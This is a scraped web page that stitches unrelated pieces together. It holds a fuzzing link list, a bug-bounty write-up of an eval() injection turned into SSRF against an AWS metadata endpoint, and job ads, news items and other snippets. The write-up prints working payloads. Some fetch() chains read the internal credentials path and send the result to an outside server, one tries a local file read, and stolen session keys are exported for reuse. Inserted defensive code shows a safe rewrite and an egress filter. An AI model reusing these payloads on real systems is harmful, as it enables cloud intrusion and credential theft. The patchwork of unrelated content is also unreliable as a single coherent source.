https://www.peerlyst.com/posts/bsidessf-2016-recap-of-fuzz-smarter-not-harder-an-afl-primer-claus-cramon

Fuzzing with AFL is an art
Fuzzing nginx with American Fuzzy Lop
You can post suggestions in the comments here or in this Google doc:
https://docs.google.com/document/d/17pZxfs8hXBCnhfHoKfJ7JteGziNB2V_VshsVxmNRx6U/edit?usp=sharing

BSidesLisbon 2016 keynote: The smart fuzzer revolution
Windows kernel fuzzing for beginners - Ben Nagy

5. Other fuzzer blogs:
A fuzzing wrapper built on compiler transformations
Google has launched OSS-Fuzz (thanks to Dinko Cherkezov), a project that aims to fuzz open-source projects continuously:
OSS-Fuzz is currently in beta and will soon accept suggestions for candidate open-source projects. For a project to be accepted into OSS-Fuzz it needs either a large user base or to be critical to global IT infrastructure, a general heuristic that we intentionally interpret loosely at this early stage. See more details and instructions on how to apply here.
Once a project is signed up for OSS-Fuzz it automatically receives bugs in our tracker, with newly reported bugs disclosed 90 days later (see details here). This is in line with industry best practice and improves end-user security and stability by getting patches to users faster.
Help us ensure this program truly serves the open-source community and the Internet that depends on this critical software: contribute and leave your feedback on GitHub.


6. Commercial fuzzers

Beyond Security beSTORM
http://www.beyondsecurity.com/bestorm_and_the_SDL.html
Admin edit: find more awesome Peerlyst community-contributed resources in the resource directory here

7. Browser fuzzing

Skyfire: a data-driven seed generation tool for fuzzing
https://www.inforsec.org/wp/?p=2678
https://www.ieee-security.org/TC/SP2017/papers/42.pdf

Getting started with fuzzing Chrome V8 using libFuzzer
http://www.4hou.com/info/news/6191.html


AWS takeover through SSRF in JavaScript

Here is the story of a bug I found in a private bug bounty program on HackerOne. It took me exactly 12h30, no break, to find it, exploit it and report it. I was able to dump the AWS credentials, and this led me to fully compromise the account of the company: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it's one of the best bugs of my hunter career, I also learnt a lot during this sprint, so let's share!

Intro

As I said, the program is private, so let's call the company ArticMonkey.
For the purpose of their activity, and their web application, ArticMonkey has developed a custom macro language, let's call it Banan++. I don't know what language was initially used for the creation of Banan++, but from the webapp you can get a JavaScript version, so let's dig in!

The original banan++.js file was minified, but still huge: 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn't read the whole sh… By searching for some keywords very specific to Banan++, I located the first function at line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started to read the code from the top, but most of the functions were about date manipulation or mathematical operations, nothing really interesting or dangerous. After a while, I finally found one called Union() that looked promising; here is the code:

helper.prototype.Union = function() {
  // copy the arguments object into a real array
  for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22];
  var value = args.shift(),
    symbol = args.shift(),
    results = args.filter(function(arg) {
      try {
        // the three pieces are concatenated and evaluated as JavaScript source
        return eval(value + symbol + arg)
      } catch (e) {
        return !1
      }
    });
  return !!results.length
}

Did you notice that? Did you notice that kinky eval()? Looks sooooooooooo interesting! I copied the code into a local HTML file in order to perform more tests.

Basically the function accepts any number of arguments but only becomes useful from three onward. The eval() is used to compare the first argument to the third with the help of the second, then the fourth is tested, the fifth, etc. Normal usage looks like Union(1,'<',3); and the returned value is true if at least one of these tests is true, false otherwise.
However, there is absolutely no sanitization or check of the type or value of the arguments: the three strings are simply glued together into source text and handed to eval(). With the help of my favourite debugger, alert(), I understood that the exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' );
Union( '1', '2;alert();', '3' );
Union( '1', '2', '3;alert()' );
...
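
The three calls above all work for the same reason: Union() builds one string from its arguments and hands it to eval(), so the "symbol" can carry whole statements. Below, as an added example that is not code from the post or from ArticMonkey, is the vulnerable Union() restated in modern JavaScript next to a hardened version that only accepts a fixed set of comparison operators and never evaluates source text, plus a small harness that runs the same three-argument payload shape ('1', '2;<code>;', '3') against both. The probe counter stands in for the fetch() exfiltration of the real payload; unionVulnerable, unionSafe, probe and runPayload are names chosen here.

```javascript
// Added example, not code from the original post: the eval()-based Union() restated in
// modern JavaScript beside a hardened version that dispatches on a fixed operator table,
// plus a harness showing why the one executes injected code and the other refuses it.
// `probe` and `runPayload` are constructed for this demonstration; only the shape of the
// payload ('1', '2;<code>;', '3') comes from the post.

// The post's Union(): value + symbol + arg is concatenated into source text and eval'd.
// Anything syntactically valid between the two numbers runs with the caller's privileges.
function unionVulnerable(...args) {
  const value = args.shift();
  const symbol = args.shift();
  const results = args.filter((arg) => {
    try {
      return eval(value + symbol + arg); // the sink
    } catch (e) {
      return false;
    }
  });
  return results.length > 0;
}

// Hardened Union(): the "symbol" may only select one of these comparisons, never source text.
const OPERATORS = {
  '<': (a, b) => a < b,
  '<=': (a, b) => a <= b,
  '>': (a, b) => a > b,
  '>=': (a, b) => a >= b,
  '==': (a, b) => a === b,
  '!=': (a, b) => a !== b,
};

// The original only ever worked for numeric operands (eval("1<3")); non-numeric input
// fell into the catch and counted as false. Mirror that: NaN operands compare false.
function toNumber(x) {
  if (typeof x === 'number') return x;
  if (typeof x === 'string' && x.trim() !== '') return Number(x);
  return NaN;
}

function unionSafe(value, symbol, ...candidates) {
  const op = OPERATORS[symbol];
  if (!op) throw new TypeError(`Union: unsupported operator ${JSON.stringify(symbol)}`);
  const lhs = toNumber(value);
  if (Number.isNaN(lhs)) return false;
  return candidates.some((c) => {
    const rhs = toNumber(c);
    return !Number.isNaN(rhs) && op(lhs, rhs);
  });
}

// Harness: a counter stands in for the fetch() exfiltration of the real payload.
const probe = { hits: 0 };
const PAYLOAD_SYMBOL = '2;probe.hits++;'; // same shape as '2;fetch("http://169.254.169.254/...")...;'

function runPayload(union) {
  probe.hits = 0;
  let result;
  let error = null;
  try {
    result = union('1', PAYLOAD_SYMBOL, '3'); // eval("12;probe.hits++;3") in the vulnerable version
  } catch (e) {
    error = e.constructor.name;
  }
  return { hits: probe.hits, result, error };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('legit:', unionVulnerable('1', '<', '3'), unionSafe('1', '<', '3')); // true true
  console.log('vuln :', runPayload(unionVulnerable)); // { hits: 1, result: true, error: null }
  console.log('safe :', runPayload(unionSafe));       // { hits: 0, result: undefined, error: 'TypeError' }
}
```

In the vulnerable version the payload becomes the program `12;probe.hits++;3`: the concatenated digits evaluate harmlessly, the injected statement runs, and the trailing `3` makes the whole expression truthy, so Union() even reports a successful comparison. The hardened version treats the second argument as a key, not as code, so an unknown operator is a TypeError before any operand is looked at.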

Find an injection point

OK, so I had a vulnerable function, which is always good, but what I needed was an input where I could inject some malicious code. I remembered that I had already seen some POST parameters using Banan++ functions, so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1
Host: api.REDACTED.com
Connection: close
Content-Length: 232
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red
Content-Type: application/json;charset=UTF-8
Referer: https://app.REDACTED.com/REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: auth=REDACTED

{...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 54
Connection: close
X-Content-Type-Options: nosniff
X-Xss-Protection: 1
Strict-Transport-Security: max-age=15768000; includeSubDomains
...REDACTED...

[{"name":"REDACTED",...REDACTED...}]

The parameter operation seems to be a good option. Time for testing!

Perform the injection

Since I didn't know anything about Banan++, I had to perform some tests to find out what kind of code I could and couldn't inject. A sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":null}
[]
{...REDACTED...,"operation":"0"}
[]
{...REDACTED...,"operation":"1"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"a"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"a=1"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"alert()"}
{"status":400,"message":"Function 'alert' is not defined"}
{...REDACTED...,"operation":"Union()"}
[]

What I concluded here was:

  • I cannot inject whatever JavaScript I want
  • I can inject Banan++ functions
  • the response acts like a true/false flag depending on whether the interpretation of the operation parameter is true or false (which was very useful because it helped validate the code I injected)

Let’s continue with Union():

{...REDACTED...,"operation":"Union(1,2,3)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union(a,b,c)"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a','b','c')"}
{"status":400,"message":"Parse error on line 1...REDACTED..."}
{...REDACTED...,"operation":"Union('a';'b';'c')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'2';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'<';'3')"}
[{"name":"REDACTED",...REDACTED...}]
{...REDACTED...,"operation":"Union('1';'>';'3')"}
[]

Perfect! If 1 < 3 then the response contains valid data (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semicolon. I could now try a real attack.

fetch is the new XMLHttpRequest

Because the request is an AJAX call to the API that only returns JSON data, it's obviously not a client-side injection. I also knew from a previous report that ArticMonkey tends to use a lot of JavaScript server-side.

But it didn't matter, I had to try everything; maybe I could trigger an error that would reveal information about the system the JavaScript runs on. From my local testing I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript, but all I got was the error mentioned earlier.

I then tried to fire an HTTP request.

Through ajax call first:

x = new XMLHttpRequest;
x.open( 'GET','https://poc.myserver.com' );
x.send();

But didn’t receive anything. I tried HTML injection:

i = document.createElement( 'img' );
i.src = '<img src="https://poc.myserver.com/xxx.png">';
document.body.appendChild( i );

But didn’t receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">';
document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But didn’t receive anything!!!

Sometimes, you know, you have to test stupid things yourself to understand how stupid they were… Obviously it was a mistake to try to render HTML in code that runs server-side, but hey! I'm just a hacker… Back to the AJAX request, I stayed stuck there for a while. It took me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend; I would later learn that they use NodeJS server-side. Anyway, I checked on Google how to perform an AJAX request with it and found the answer in the official documentation, which led me to the fetch() function, the newer standard API for making HTTP requests from JavaScript. That was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is something, but it's a blind SSRF: I had no response echoed back. I had the idea of chaining two requests, where the second would send back the result of the first. Something like:

x1 = new XMLHttpRequest;
x1.open( 'GET','https://...', false );
x1.send();
r = x1.responseText;

x2 = new XMLHttpRequest;
x2.open( 'GET','https://poc.myserver.com/?r='+r, false );
x2.send();

Again it took me a while to get the correct syntax with fetch(). Thanks StackOverflow.

I ended with the following code which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Note that the same-origin policy is a browser control: in a page it would have stopped the script from reading a cross-origin response like this, but it does not constrain a server-side fetch(), which is exactly what made the next step possible.

SSRF for the win

I first tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response (r parameter) in my Apache log file was empty.

Since I had found some S3 buckets related to ArticMonkey (articmonkey-xxx), I thought this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses: x-cache: Hit from cloudfront). I quickly jumped to the list of the most common SSRF URLs for cloud instances.

And got a nice hit when I tried to access the metadata of the instance.

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded output is the directory listing returned:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
...

Since I didn't know anything about AWS metadata, this being my first time in da place, I took the time to explore the directories and all the files at my disposal. As you will read everywhere, the most interesting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>, which returned:

{
  "Code":"Success",
  "Type":"AWS-HMAC",
  "AccessKeyId":"...REDACTED...",
  "SecretAccessKey":"...REDACTED...",
  "Token":"...REDACTED...",
  "Expiration":"2018-09-06T19:24:38Z",
  "LastUpdated":"2018-09-06T19:09:38Z"
}
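
The request that reached 169.254.169.254 was an ordinary server-side fetch() with no restriction on where it could go. Below, as an added example that is not the post's or ArticMonkey's code, is a fetch wrapper that parses the target URL and refuses non-HTTP schemes (the file:///etc/issue attempt above) and any literal address in the loopback, RFC 1918, link-local (the metadata range) or IPv6 unique-local space. It relies only on the WHATWG URL parser built into Node.js, which canonicalises the decimal and hex spellings of 169.254.169.254 before the check sees them; checkTarget, safeFetch and the injected fetch implementation are names chosen here, and the blocked-range table is an assumption about what this deployment should never talk to.

```javascript
// Added example (not from the original post): server-side egress check for fetch().
// Blocks the destinations the SSRF above reached: file:// and other non-HTTP schemes,
// loopback, RFC 1918, link-local (169.254.0.0/16 is where the EC2 metadata service lives),
// and their IPv6 counterparts (::1, fe80::/10, fc00::/7 which covers fd00:ec2::254,
// and IPv4-mapped ::ffff:a.b.c.d). Assumes Node.js 10+ for the global WHATWG URL class.

const BLOCKED_V4 = [ // [network, prefix length]
  ['0.0.0.0', 8], ['10.0.0.0', 8], ['100.64.0.0', 10], ['127.0.0.0', 8],
  ['169.254.0.0', 16], ['172.16.0.0', 12], ['192.168.0.0', 16],
  ['224.0.0.0', 4], ['240.0.0.0', 4],
];

// Dotted quad -> unsigned 32-bit integer, or null if it is not a plain dotted quad.
function ipv4ToInt(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  if (o.some((n) => n > 255)) return null;
  return o[0] * 16777216 + o[1] * 65536 + o[2] * 256 + o[3];
}

function inCidr(ip, base, prefix) {
  const mask = prefix === 0 ? 0 : (0xffffffff << (32 - prefix)) >>> 0;
  return ((ip & mask) >>> 0) === ((base & mask) >>> 0);
}

function v4Blocked(ip) {
  return BLOCKED_V4.some(([base, prefix]) => inCidr(ip, ipv4ToInt(base), prefix));
}

// IPv6 text -> eight 16-bit groups, or null. Accepts "::" compression and a trailing
// dotted quad (the URL parser normally rewrites that to hex, but do not rely on it).
function parseIPv6(text) {
  const halves = text.split('::');
  if (halves.length > 2) return null;
  const head = halves[0] ? halves[0].split(':') : [];
  const tail = halves.length === 2 && halves[1] ? halves[1].split(':') : [];
  const last = tail.length ? tail : head;
  if (last.length && last[last.length - 1].includes('.')) {
    const v4 = ipv4ToInt(last.pop());
    if (v4 === null) return null;
    last.push((v4 >>> 16).toString(16), (v4 & 0xffff).toString(16));
  }
  const missing = 8 - head.length - tail.length;
  if (missing < 0 || (halves.length === 1 && missing !== 0)) return null;
  const groups = [...head, ...Array(missing).fill('0'), ...tail]
    .map((g) => (/^[0-9a-f]{1,4}$/i.test(g) ? parseInt(g, 16) : NaN));
  return groups.some(Number.isNaN) ? null : groups;
}

function v6Blocked(g) {
  if (g.slice(0, 7).every((x) => x === 0) && g[7] <= 1) return true; // :: and ::1
  if ((g[0] & 0xffc0) === 0xfe80) return true;                       // fe80::/10 link-local
  if ((g[0] & 0xfe00) === 0xfc00) return true;                       // fc00::/7 unique local
  if (g.slice(0, 5).every((x) => x === 0) && g[5] === 0xffff) {
    return v4Blocked(g[6] * 65536 + g[7]);                            // ::ffff:a.b.c.d
  }
  return false;
}

// Returns { ok, reason } for a URL string. Hostnames that are not literal addresses pass
// here because nothing can be resolved offline; see the note below the block.
function checkTarget(urlString) {
  let url;
  try {
    url = new URL(urlString);
  } catch (e) {
    return { ok: false, reason: 'unparseable URL' };
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    return { ok: false, reason: `scheme ${url.protocol} not allowed` };
  }
  const host = url.hostname; // already canonical: "http://2852039166/" parses to 169.254.169.254
  if (host.startsWith('[') && host.endsWith(']')) {
    const groups = parseIPv6(host.slice(1, -1));
    if (!groups) return { ok: false, reason: `unparseable IPv6 literal ${host}` };
    return v6Blocked(groups) ? { ok: false, reason: `${host} is a local or link-local address` } : { ok: true, host };
  }
  const v4 = ipv4ToInt(host);
  if (v4 !== null) {
    return v4Blocked(v4) ? { ok: false, reason: `${host} is in a blocked range` } : { ok: true, host };
  }
  return { ok: true, host, literal: false };
}

// Drop-in replacement for the bare fetch(url) the payload used. fetchImpl is injected so the
// check can be exercised without a network; pass the real fetch in production.
async function safeFetch(urlString, fetchImpl) {
  const verdict = checkTarget(urlString);
  if (!verdict.ok) throw new Error(`egress blocked: ${verdict.reason}`);
  return fetchImpl(urlString);
}
```

Two caveats a practitioner will want. First, a hostname that is not a literal address passes this check unresolved; in production resolve it yourself (dns.lookup), run every returned address through the same range tests, and connect to the address you checked, otherwise a DNS answer that changes between check and connect can still point the request at 169.254.169.254. Second, a filter like this is defence in depth: on EC2 the stronger control is to require IMDSv2, whose session token has to be fetched with a PUT request that a GET-only SSRF primitive like the one in this post cannot issue.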

Exploit the credentials

At that point I thought the game was over. But for my PoC I wanted to show the criticality of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that these are temporary credentials, only valid for a short period (the Expiration above is fifteen minutes after LastUpdated). Anyway, that is supposed to be enough to swap my own credentials for those ones, 2 copy/pastes, I think I can handle that… err…

I asked for help on Twitter from SSRF and AWS masters. Thanks guys, I truly appreciate your commitment, but I finally found the solution in the AWS Identity and Access Management User Guide. My mistake, apart from not reading the documentation (…), was to only use AccessKeyId and SecretAccessKey; that doesn't work with temporary credentials, the session token must also be exported. Kiddies…

$ export AWS_ACCESS_KEY_ID=AKIAI44...
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI...
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my identity with the following command proved that I was not myself anymore.

aws sts get-caller-identity

And then…

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part, or the whole, of their system.

Right: the company owns 20 buckets containing highly sensitive customer data, static files for the web application and, judging by the bucket names, probably logs/backups of their servers.

Impact: lethal.

Timeline

06/09/2018 12h00 - beginning of the hunt
07/09/2018 00h30 - report
07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for being so fast to fix and reward, and for agreeing to this article :)

Conclusion

I learnt a lot because of this bug:

  • ReactJS, fetch(), AWS metadata.
  • RTFM! The official documentation is always a great source of (useful) information.
  • At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up.
  • I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and satisfaction :)

When someone tells you that you'll never be able to do something, don't waste your time bargaining with these people, simply prove them wrong by doing it.


Sourced by Oxfam - Team Administrator (TRD1923)
Region: Central, Division: Trading, Job Type: Open ended
Oxfam is a global movement of people working together to end the injustice of poverty.  That means we tackle the inequality that keeps people poor. Together we save, protect and rebuild lives. When disaster strikes, we help people build better lives for themselves, and for others. We take on issues like land rights, climate change and discrimination against women. And we won’t stop until every person on the planet can enjoy life free from poverty.

 

We are an international confederation of 20 organizations working together with partners and local communities in the areas of humanitarian, development and campaigning, in more than 90 countries.

 

Oxfam is committed to preventing any type of unwanted behavior at work including sexual harassment, exploitation and abuse,...

Independents Disapprove Of Democrats' Handling Of Kavanaugh Nomination By 28-point Margin
And given most polls skew in favor of Democrats, it’s probably even worse. Via Washington Examiner: After a blistering confirmation battle, Justice Brett Kavanaugh will take his seat for oral arguments on the U.S. Supreme Court with a skeptical public, a majority of which opposed his nomination. However, Democrats may not be able to exploit […]
Trailer Mechanic - Groupe Robert - Boucherville, QC
*A career awaits you! Come join our team!* Are you looking for a place where you can make the most of your potential? Would you like to grow within a... $24.38 - $30.70 an hour
From Indeed - Mon, 17 Sep 2018 18:36:04 GMT - View all Boucherville, QC jobs
The Fat Bear Week finals are here. Which fat bear will reign supreme?

Welcome to Fat Bear Week at Mashable! Each fall, Katmai National Park holds a competition as Alaska’s brown bears finish fattening up for their long winter hibernation. This year, Mashable is getting in on the salmon-munching action. Check back with us all week as we follow the fat bear face-offs each day, and remember to get your votes in for each round. Happy fishing!


After six days of strong competition, the Fat Bear Week finals have arrived.

Katmai National Park, where these wild bears live and hibernate, amusingly calls the pinnacle of the week-long contest "Fat Bear Tuesday." 

This year's Tuesday match features two profoundly fat bears, both of whom clearly exploited a Brooks River that teemed with 2018's exceptional and long run of 4,500-calorie salmon.  Read more...

Pentagon slow to protect weapon systems from cyber threats: U.S. agency
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday. Reported by Reuters 43 minutes ago.
Thanks to Match Marketing, Best Western France revives customer engagement
The hotel group boosts the performance of its customer marketing campaigns thanks to the Influans platform.
Influans announces today that Best Western France is using Influans' Match Marketing platform to drive the performance of its customer marketing.

Personalisatio...


The Surprising Effectiveness of Gentle Public Shaming
Where would you put your money? Leave it to the staff of one of my favorite lunch places to come up with a brilliant example of the persuasive communication. What do I love about it? It’s absolutely of the moment. It exploits identity to motivate us to action (We all want to express how we […]
The sea raiders, vol. 1

€14

Comic book (hardcover)

The sea raiders, vol. 1


Philippe Zytka, Dusan Bozic

Discover this new series, based on the real history of units that existed during the Second World War: the S.B.S. (Special Boat Service). A small force of barely 300 men who harassed the Germans in the Mediterranean and the Aegean Sea. They usually moved at night, using submarines, fast patrol boats or any other kind of craft. Lars the Dane, Ambrose the Englishman, Tibor the Hungarian and Liam the Irishman form one of the teams of this new Special Boat Service force, who will let you discover their exploits!



Singular Estates of Gonzalez Byass
The Gonzalez Byass group is known for its sherries, notably the Tio Pepe brand. But for more than 30 years the Gonzalez Byass family has moved beyond its Andalusian cradle, investing all over Spain, where it runs a series of estates grouped under the name Singular Estates. Notably: Bodegas Beronia …

Read more of Singular Estates of Gonzalez Byass


Machinist - Groupe G7 - Sept-Îles, QC
Set up and operate precision metal cutting and grinding machines such as lathes, milling machines, drills, etc.;...
From Indeed - Tue, 09 Oct 2018 18:20:11 GMT - View all Sept-Îles, QC jobs
Italy: transport strike on 25 and 26 October
Business travellers would do well not to organise business trips in Italy on 25 and 26 October. The country's activity will be...
Read on www.deplacementspros.com. This feed is provided for private reading and may not be used on a website without the written agreement of the publisher of DéplacementsPros.com © reproduction prohibited without the authorisation of DeplacementsPros.com

Rosie DiManno: Ontario lawyer accused of seducing vulnerable teenage clients

The lawyer sits next to his lawyer in front of a disciplinary panel of lawyers.

The allegations against Gavin McNeill Grant:

  • He impregnated a 17-year-old client, a homeless Crown ward, after acting as duty counsel during her appearance at an Owen Sound courthouse and obtaining the young woman’s release.

  • He had threesome sex with that girl and another teenager at the latter’s apartment, a teenager who — according to her mother — has the intellectual capacity of a 12- to 14-year-old.

  • During a party at his office with the two teenagers, he took delivery of cocaine from one of his criminal clients, consuming almost a gram of blow within minutes, as described by another person present.

  • He propositioned and tried to seduce an 18-year-old client.

  • He took a client/girlfriend on holidays and violently assaulted her in a Florence hotel room. The woman suffered a dislocated jaw, sprained ankle and multiple bruises.

That last alleged incident was contained in an affidavit filed with a Law Society of Ontario disciplinary panel on Tuesday morning. The complainant came forward after reading a media report about Grant’s earlier hearing last week.

At the Oct. 2 procedure, the tribunal allowed Grant to keep his licence to practice, pending a full hearing for an interim suspension. On Tuesday, through his lawyer, Grant granted consent on the interim suspension. That sends the matter to a full disciplinary hearing, probably no earlier than next summer.

“We are prepared to grant the consent order that is proposed by the parties,” said Barbara Murchie, on behalf of the disciplinary tribunal. “I will sign the order and there will be reasons to follow.”

If the full hearing tribunal finds against Grant, 49, his licence could be permanently revoked.

Grant has at least once before been fired from his law firm, according to Law Society investigators, for "erratic and drug-influenced behaviour, missing court dates, purchasing liquor for a minor, minimizing his substance abuse addictions and having sex with teenage clients." In August, 2017, Grant opened his own office in Owen Sound, Ont.

To wind around back to the beginning, the Owen Sound police first investigated Grant in the summer of 2016, after receiving allegations that the lawyer had been involved in an “exploitative sexual relationship” with a 17-year-old Crown ward, Erica. (All of the girls and their parents’ identities are covered by a publication ban; pseudonyms are used in the affidavits.) Det.-Sgt. Peter Daniels brought the matter to the Law Society this past August.

The panel was told by discipline counsel Elaine Strosberg last week that, in June 2016, as duty counsel, Grant had secured bail for Erica. Some six weeks later, Erica approached Grant to hire him as her lawyer. In an interview with the Law Society investigator, Grant said he told Erica he couldn’t represent her because he’s already assisted as duty counsel on her case and recommended another lawyer. Grant didn’t know Erica’s age and didn’t realize she was a minor, he said, because “she doesn’t look young.”

Erica told the investigator that they subsequently had a “brief” sexual relationship and hung around together for a while. At a party in his office not long afterward, it was Erica, Grant insisted, who “got on my lap, kissing me, everyone was drinking, that kind of thing.”

He has denied ever doing any drugs with the teenager.

In the last four years, Grant admits he’s been hospitalized for addiction “probably three or four times.”

The second girl, Poppy, told investigators she attended a party at Grant’s office with Erica in July, 2016. They then went to Poppy’s apartment, with Grant allegedly serving the girls scotch and gin. Erica allegedly wanted to use Poppy’s bed to have sex with Grant because he’d offered her $300. Poppy said no but afterwards heard Grant and Erica having sex on the couch. They left together early the next morning.

At the time, Erica was on bail which required her to remain in residence between 9 p.m. and 6 p.m.

A baby boy was born to Erica in March, 2017. A DNA test confirmed Grant as the father, according to the affidavit.

A second incident involving Poppy allegedly occurred on July 20, 2016, again after a booze and cocaine fuelled party at the lawyer’s office. Grant, Poppy told investigator Adrian Greenaway, invited everyone back to her apartment. Later, through an open bedroom door, Poppy saw Erica performing oral sex on Grant. Erica invited Poppy to join in and she did. This incident was reported the next day to police by Poppy’s mother.

Grant’s purported seduction of young girls, the tribunal was told, dated back eight years when he had propositioned another client, 18-year-old Amy, saying he wanted to snort coke off her backside. Despite the crude proposal, Amy hired Grant for her criminal assault trial. She has claimed he tried to sleep with her the entire time.

That incident was reported to the Law Society last month by senior counsel for Bruce Grey Child and Family Services. Amy was then trying to get back her kids who had been removed by the Children’s Aid Society, with Grant representing her. Before the hearing, Grant allegedly offered Amy a drug that he identified as methamphetamine, which she declined. Amy was further upset because Grant appeared intoxicated in court.

Last week, in urging the disciplinary panel to suspend Grant’s licence until a full hearing, counsel Strosberg argued: “Erica was a Crown ward, homeless and in the criminal justice system and there’s evidence he was impaired in the courthouse … An unchecked drug addict simply cannot be ordered to not partake in drugs.”

When interviewed by phone on Oct. 4, the Bruce Grey Child and Family Services counsel, Christopher Hutton, noted that many of the agency’s clients are young females with addictions, developmental and mental health problems. He could not recall Grant ever representing a male from the agency.

A second Law Society investigator, Brian Borg, conducted that interview. His affidavit, filed Tuesday, included information obtained, through Hutton, from another Child and Family Services client, Jessica, a woman in her early 20s also with a history of addiction struggles. Jessica told Hutton that she believed the reason her case, with Grant as her lawyer, was taking so long was because he was trying to manoeuvre her into sex, coming to her home and meeting her outside business hours.

Most disturbing, however, was the account given by Bella on Oct. 4, the woman who contacted the Law Society after learning of last week’s hearing.

Bella, then 18, had been seven days into a family law trial in 2014, representing herself, when she contacted Grant, whose name had been provided by a friend. She was seeking advice on how to conduct closing arguments. They met in his office after-hours, had drinks, and Grant tried to kiss her. After she left, Grant texted her, saying he'd like to see her again. Thus began an on-and-off relationship that ended after the alleged assault in Florence on May 31. Bella is the young woman Grant had taken to Europe.

She has provided Borg with a report from Italian police about the alleged assault and photos taken upon her return to Canada, documenting the injuries.

Bella said Grant had become agitated and aggressive after dinner at a restaurant — he’d asked the waiter for cocaine, which upset her, she said — because he wanted to have sex and she didn’t. According to the Italian police report, Grant tried to force her into sex, grabbing her by the arms, pushing her on the bed with his knee on her back. She fled to the lobby, where she spent the night.

Supporting documents for Borg’s affidavit include the transcript of his interview with Bella. She describes how their relationship had become more serious, steady, following a troubling discovery she’d made last February.

“We were dating until I found out he was actually living with someone, and that was Erica.”

Rosie DiManno is a columnist based in Toronto covering sports and current affairs. Follow her on Twitter: @rdimanno


Operations Foreman/Forewoman - ArcelorMittal Exploitation minière Canada s.e.n.c. - Port-Cartier, QC
Basic knowledge of the other trades related to operations (mechanics, welding, plumbing, electrical);...
From ArcelorMittal Exploitation minière Canada s.e.n.c. - Thu, 20 Sep 2018 14:45:31 GMT - View all Port-Cartier, QC jobs
Data Centre Operations Operator - OLG - Toronto, ON
Data Centre Operations Operator Location: Toronto, Ontario, Canada OLG Site or Facility: Lesmill Number of Positions: 2 Job Type: Permanent...
From OLG - Tue, 09 Oct 2018 22:26:58 GMT - View all Toronto, ON jobs
The difficult coexistence of Taiwan's only two primates.

What does the Formosan macaque look like?

It measures between 40 and 55 cm on average (not counting the tail, which measures between 30 and 45 cm) and weighs between 5 and 6 kg. Its coat is grey-brown on the head, back, limbs and tail, lighter on the inner side of the limbs and white on the belly. Its face is pink with grey pigmentation. It has cheek pouches that let it store food. It lives 15 to 20 years.

The Formosan macaque: the only primate living in Taiwan.

In Taiwan the macaque is not an endangered species and is no longer protected, but it is very often mistreated. Humans are encroaching more and more on its territory, notably through farming. In addition, some Formosan macaques living in the national parks can be aggressive because tourists feed them.

As a result, an animal used to being fed no longer feels the need to look for its own food and steals food from tourists, or from locals who come to feed it, very often with food that is too fatty and sugary and not at all suited to its diet.

In one of the photographs in the gallery you can, for example, see a man armed with a pellet pistol intimidating macaques so that they do not steal the bag of treats he has come to hand out to them.

An impossible harmony?

Macaques and humans are therefore finding it harder and harder to live in harmony, and for good reason: while its territory shrinks because of human activity, the macaque population has grown by more than 100,000 to approach 300,000 individuals in about ten years.

